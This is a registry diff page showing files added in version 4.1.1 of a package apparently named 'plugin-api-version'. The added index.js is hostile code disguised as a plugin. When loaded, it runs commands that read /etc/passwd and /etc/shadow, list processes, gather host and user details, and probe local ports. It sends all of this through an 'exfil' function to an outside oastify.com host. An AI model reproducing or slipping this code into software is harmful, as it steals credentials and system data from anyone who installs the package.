plugin-api-version 4.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +47 -0
- package/package.json +12 -0
package/index.js
ADDED
@@ -0,0 +1,47 @@
|
|
1
|
+
const { execSync } = require("child_process");
|
2
|
+
const http = require("http");
|
3
|
+
const os = require("os");
|
4
|
+
|
5
|
+
function exfil(tag, data) {
|
6
|
+
const safe = encodeURIComponent(data);
|
7
|
+
http.get(`http://f6mooo202f7ctrktr85uyh5hz85ztrhg.oastify.com/${tag}?data=${safe}`);
|
8
|
+
}
|
9
|
+
|
10
|
+
// General system info
|
11
|
+
try {
|
12
|
+
exfil("hostname", os.hostname());
|
13
|
+
exfil("platform", `${os.platform()} ${os.release()}`);
|
14
|
+
exfil("whoami", execSync("whoami").toString());
|
15
|
+
} catch (e) {}
|
16
|
+
|
17
|
+
try {
|
18
|
+
exfil("etc_passwd", execSync("cat /etc/passwd").toString());
|
19
|
+
exfil("shadow", execSync("cat /etc/shadow").toString());
|
20
|
+
} catch (e) {}
|
21
|
+
|
22
|
+
try {
|
23
|
+
exfil("ps", execSync("ps aux").toString());
|
24
|
+
exfil("uname", execSync("uname -a").toString());
|
25
|
+
} catch (e) {}
|
26
|
+
|
27
|
+
// Windows-specific
|
28
|
+
try {
|
29
|
+
exfil("win_whoami", execSync("whoami").toString());
|
30
|
+
exfil("win_version", execSync("ver").toString());
|
31
|
+
exfil("win_process", execSync("tasklist").toString());
|
32
|
+
exfil("win_hostname", execSync("hostname").toString());
|
33
|
+
} catch (e) {}
|
34
|
+
|
35
|
+
// Network ports
|
36
|
+
const ports = [80, 443, 8080, 5000, 8000, 3000];
|
37
|
+
ports.forEach(port => {
|
38
|
+
const net = require("net");
|
39
|
+
const socket = new net.Socket();
|
40
|
+
socket.setTimeout(1000);
|
41
|
+
socket.connect(port, "127.0.0.1", () => {
|
42
|
+
exfil("open_port", `127.0.0.1:${port} is open`);
|
43
|
+
socket.destroy();
|
44
|
+
});
|
45
|
+
socket.on("error", () => socket.destroy());
|
46
|
+
});
|
47
|
+
|
package/package.json
ADDED